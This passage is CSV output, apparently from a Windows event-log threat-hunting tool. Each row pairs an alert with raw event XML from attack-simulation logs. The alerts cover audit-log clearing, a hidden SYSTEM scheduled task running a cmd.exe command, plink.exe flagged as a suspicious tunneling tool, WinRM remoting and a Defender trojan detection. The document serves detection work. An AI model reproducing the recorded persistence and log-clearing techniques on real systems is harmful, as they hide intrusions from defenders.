c2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14674</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Audit log cleared,1552907189.911579,2019-03-18T15:06:29.911579+04:00,,Audit,Critical,schedule task created by user,4698,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4698</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T00:02:04.319945Z"">
</TimeCreated>
<EventRecordID>566836</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""452"" ThreadID=""2836"">
</Execution>
<Channel>Security</Channel>
<Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-1587066498-1489273250-1035260531-500</Data>
<Data Name=""SubjectUserName"">Administrator</Data>
<Data Name=""SubjectDomainName"">EXAMPLE</Data>
<Data Name=""SubjectLogonId"">0x17e2d2</Data>
<Data Name=""TaskName"">\CYAlyNSS</Data>
<Data Name=""TaskContent"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt;
&lt;Task version=&quot;1.2&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt;
&lt;Triggers&gt;
&lt;CalendarTrigger&gt;
&lt;StartBoundary&gt;2015-07-15T20:35:13.2757294&lt;/StartBoundary&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;ScheduleByDay&gt;
&lt;DaysInterval&gt;1&lt;/DaysInterval&gt;
&lt;/ScheduleByDay&gt;
&lt;/CalendarTrigger&gt;
&lt;/Triggers&gt;
&lt;Principals&gt;
&lt;Principal id=&quot;LocalSystem&quot;&gt;
&lt;UserId&gt;S-1-5-18&lt;/UserId&gt;
&lt;RunLevel&gt;HighestAvailable&lt;/RunLevel&gt;
&lt;LogonType&gt;InteractiveToken&lt;/LogonType&gt;
&lt;/Principal&gt;
&lt;/Principals&gt;
&lt;Settings&gt;
&lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt;
&lt;DisallowStartIfOnBatteries&gt;false&lt;/DisallowStartIfOnBatteries&gt;
&lt;StopIfGoingOnBatteries&gt;false&lt;/StopIfGoingOnBatteries&gt;
&lt;AllowHardTerminate&gt;true&lt;/AllowHardTerminate&gt;
&lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt;
&lt;IdleSettings&gt;
&lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt;
&lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt;
&lt;/IdleSettings&gt;
&lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;Hidden&gt;true&lt;/Hidden&gt;
&lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt;
&lt;WakeToRun&gt;false&lt;/WakeToRun&gt;
&lt;ExecutionTimeLimit&gt;P3D&lt;/ExecutionTimeLimit&gt;
&lt;Priority&gt;7&lt;/Priority&gt;
&lt;/Settings&gt;
&lt;Actions Context=&quot;LocalSystem&quot;&gt;
&lt;Exec&gt;
&lt;Command&gt;cmd.exe&lt;/Command&gt;
&lt;Arguments&gt;/C tasklist &amp;gt; %windir%\Temp\CYAlyNSS.tmp 2&amp;gt;&amp;amp;1&lt;/Arguments&gt;
&lt;/Exec&gt;
&lt;/Actions&gt;
&lt;/Task&gt;</Data>
</EventData>
</Event>",PC01.example.corp,Security
schedule task created,1552953724.335561,2019-03-19T04:02:04.335561+04:00,,Audit,High,Audit log cleared by user ( user01 ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-18T11:06:25.485214Z"">
</TimeCreated>
<EventRecordID>432901</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""856"" ThreadID=""2200"">
</Execution>
<Channel>Security</Channel>
<Computer>PC01.example.corp</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-1106</SubjectUserSid>
<SubjectUserName>user01</SubjectUserName>
<SubjectDomainName>EXAMPLE</SubjectDomainName>
<SubjectLogonId>0x18a7875</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",WIN-77LTAPHIQ1R.example.corp,Security
network share object was added,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,network share object was added,5142,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5142</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12808</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-17T19:30:30.324836Z"">
</TimeCreated>
<EventRecordID>6273</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""4"" ThreadID=""64"">
</Execution>
<Channel>Security</Channel>
<Computer>PC04.example.corp</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
<Data Name=""SubjectUserName"">IEUser</Data>
<Data Name=""SubjectDomainName"">PC04</Data>
<Data Name=""SubjectLogonId"">0x128a9</Data>
<Data Name=""ShareName"">\\*\PRINT</Data>
<Data Name=""ShareLocalPath"">c:\windows\system32</Data>
</EventData>
</Event>",PC04.example.corp,Security
Audit log cleared,1552953724.179623,2019-03-19T04:02:04.179623+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T00:02:00.383090Z"">
</TimeCreated>
<EventRecordID>566821</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""780"" ThreadID=""3480"">
</Execution>
<Channel>Security</Channel>
<Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-500</SubjectUserSid>
<SubjectUserName>administrator</SubjectUserName>
<SubjectDomainName>EXAMPLE</SubjectDomainName>
<SubjectLogonId>0x4fd77</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",WIN-77LTAPHIQ1R.example.corp,Security
Audit log cleared,1552851030.324836,2019-03-17T23:30:30.324836+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-17T19:26:42.116688Z"">
</TimeCreated>
<EventRecordID>6272</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""792"" ThreadID=""3120"">
</Execution>
<Channel>Security</Channel>
<Computer>PC04.example.corp</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-3583694148-1414552638-2922671848-1000</SubjectUserSid>
<SubjectUserName>IEUser</SubjectUserName>
<SubjectDomainName>PC04</SubjectDomainName>
<SubjectLogonId>0x128a9</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",PC04.example.corp,Security
Audit log cleared,1552951423.570212,2019-03-19T03:23:43.570212+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-18T23:23:37.147709Z"">
</TimeCreated>
<EventRecordID>565591</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""780"" ThreadID=""2472"">
</Execution>
<Channel>Security</Channel>
<Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-500</SubjectUserSid>
<SubjectUserName>administrator</SubjectUserName>
<SubjectDomainName>EXAMPLE</SubjectDomainName>
<SubjectLogonId>0x4fd77</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",WIN-77LTAPHIQ1R.example.corp,Security
Audit log cleared,1547969410.645116,2019-01-20T11:30:10.645116+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-01-20T07:29:57.863893Z"">
</TimeCreated>
<EventRecordID>32950</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""736"" ThreadID=""2372"">
</Execution>
<Channel>Security</Channel>
<Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-500</SubjectUserSid>
<SubjectUserName>Administrator</SubjectUserName>
<SubjectDomainName>EXAMPLE</SubjectDomainName>
<SubjectLogonId>0x35312</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",WIN-77LTAPHIQ1R.example.corp,Security
Audit log cleared,1547967656.784849,2019-01-20T11:00:56.784849+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-01-20T07:00:50.800225Z"">
</TimeCreated>
<EventRecordID>32853</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""736"" ThreadID=""1592"">
</Execution>
<Channel>Security</Channel>
<Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-500</SubjectUserSid>
<SubjectUserName>Administrator</SubjectUserName>
<SubjectDomainName>EXAMPLE</SubjectDomainName>
<SubjectLogonId>0x35312</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",WIN-77LTAPHIQ1R.example.corp,Security
Audit log cleared,1600193079.987052,2020-09-15T22:04:39.987052+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2020-09-15T18:04:36.333991Z"">
</TimeCreated>
<EventRecordID>161471</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1276"" ThreadID=""6720"">
</Execution>
<Channel>Security</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-3461203602-4096304019-2269080069-1000</SubjectUserSid>
<SubjectUserName>IEUser</SubjectUserName>
<SubjectDomainName>MSEDGEWIN10</SubjectDomainName>
<SubjectLogonId>0x52a7d</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",MSEDGEWIN10,Security
Audit log cleared,1552908425.42562,2019-03-18T15:27:05.425620+04:00,,Audit,Critical,Audit log cleared by user ( user01 ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-18T11:27:00.438449Z"">
</TimeCreated>
<EventRecordID>433307</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""856"" ThreadID=""1660"">
</Execution>
<Channel>Security</Channel>
<Computer>PC01.example.corp</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-1106</SubjectUserSid>
<SubjectUserName>user01</SubjectUserName>
<SubjectDomainName>EXAMPLE</SubjectDomainName>
<SubjectLogonId>0x18a7875</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",PC01.example.corp,Security
Suspicious Command or process found in the log,1550081008.338519,2019-02-13T22:03:28.338519+04:00,,Threat,Critical,Found a log contain suspicious command or process ( plink.exe),4688,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4688</EventID>
<Version>1</Version>
<Level>0</Level>
<Task>13312</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-02-13T18:03:28.318440Z"">
</TimeCreated>
<EventRecordID>227714</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""4"" ThreadID=""56"">
</Execution>
<Channel>Security</Channel>
<Computer>PC01.example.corp</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-1587066498-1489273250-1035260531-1106</Data>
<Data Name=""SubjectUserName"">user01</Data>
<Data Name=""SubjectDomainName"">EXAMPLE</Data>
<Data Name=""SubjectLogonId"">0x2ed80</Data>
<Data Name=""NewProcessId"">0xcfc</Data>
<Data Name=""NewProcessName"">C:\Users\user01\Desktop\plink.exe</Data>
<Data Name=""TokenElevationType"">%%1936</Data>
<Data Name=""ProcessId"">0xe60</Data>
<Data Name=""CommandLine""></Data>
</EventData>
</Event>",PC01.example.corp,Security
Process running in Unusual location,1550081008.338519,2019-02-13T22:03:28.338519+04:00,,Threat,High,"User Name : ( user01 ) with process : ( C:\Users\user01\Desktop\plink.exe ) run from Unusual location , check the number and date of execution in process execution report",4688,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4688</EventID>
<Version>1</Version>
<Level>0</Level>
<Task>13312</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-02-13T18:03:28.318440Z"">
</TimeCreated>
<EventRecordID>227714</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""4"" ThreadID=""56"">
</Execution>
<Channel>Security</Channel>
<Computer>PC01.example.corp</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-1587066498-1489273250-1035260531-1106</Data>
<Data Name=""SubjectUserName"">user01</Data>
<Data Name=""SubjectDomainName"">EXAMPLE</Data>
<Data Name=""SubjectLogonId"">0x2ed80</Data>
<Data Name=""NewProcessId"">0xcfc</Data>
<Data Name=""NewProcessName"">C:\Users\user01\Desktop\plink.exe</Data>
<Data Name=""TokenElevationType"">%%1936</Data>
<Data Name=""ProcessId"">0xe60</Data>
<Data Name=""CommandLine""></Data>
</EventData>
</Event>",PC01.example.corp,Security
Audit log cleared,1550080907.51234,2019-02-13T22:01:47.512340+04:00,,Audit,Critical,Audit log cleared by user ( admin01 ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-02-13T18:01:41.593830Z"">
</TimeCreated>
<EventRecordID>227693</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""820"" ThreadID=""608"">
</Execution>
<Channel>Security</Channel>
<Computer>PC01.example.corp</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-1108</SubjectUserSid>
<SubjectUserName>admin01</SubjectUserName>
<SubjectDomainName>EXAMPLE</SubjectDomainName>
<SubjectLogonId>0xaf855</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",PC01.example.corp,Security
connection is initiated using WinRM to this machine - Powershell remoting,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,User (S-1-5-21-738609754-2819869699-4189121830-500) Connected to this machine using WinRM - powershell remote - check eventlog viewer,91,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-WinRM"" Guid=""{a7975c8f-ac13-49f1-87da-5a984a4ab417}"">
</Provider>
<EventID>91</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>9</Task>
<Opcode>0</Opcode>
<Keywords>0x4000000000000004</Keywords>
<TimeCreated SystemTime=""2019-05-16T01:33:54.567896Z"">
</TimeCreated>
<EventRecordID>508</EventRecordID>
<Correlation ActivityID=""AE1A2CAB-0B85-0000-AC2F-1AAE850BD501"">
</Correlation>
<Execution ProcessID=""952"" ThreadID=""960"">
</Execution>
<Channel>Microsoft-Windows-WinRM/Operational</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security UserID=""S-1-5-21-738609754-2819869699-4189121830-500"">
</Security>
</System>
<ProcessingErrorData>
<ErrorCode>15005</ErrorCode>
<DataItemName>shellId</DataItemName>
<EventPayload>68007400740070003A002F002F0073006300680065006D00610073002E006D006900630072006F0073006F00660074002E0063006F006D002F007700620065006D002F00770073006D0061006E002F0031002F00770069006E0064006F00770073002F007300680065006C006C002F0063006D0064000000</EventPayload>
</ProcessingErrorData>
</Event>",DC1.insecurebank.local,Microsoft-Windows-WinRM/Operational
Windows Defender took action against Malware,1563483223.034598,2019-07-19T00:53:43.034598+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:XML/Exeselrun.gen!A ) , Action ( 6 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1117</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:53:31.952568Z"">
</TimeCreated>
<EventRecordID>106</EventRecordID>
<Correlation ActivityID=""2AD0CF94-C382-4568-A488-1253A4ED0F54"">
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""6068"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{8791B1FB-0FE7-412E-B084-524CB5A221F3}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:13.775Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147735426</Data>
<Data Name=""Threat Name"">Trojan:XML/Exeselrun.gen!A</Data>
<Data Name=""Severity ID"">5</Data>
<Data Name=""Severity Name"">Severe</Data>
<Data Name=""Category ID"">8</Data>
<Data Name=""Category Name"">Trojan</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:XML/Exeselrun.gen!A&amp;threatid=2147735426&amp;enterprise=0</Data>
<Data Name=""Status Code"">5</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">2</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">2</Data>
<Data Name=""Type Name"">%%823</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">6</Data>
<Data Name=""Action Name"">%%811</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x80508023</Data>
<Data Name=""Error Description"">The program could not find the malware and other potentially unwanted software on this device. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
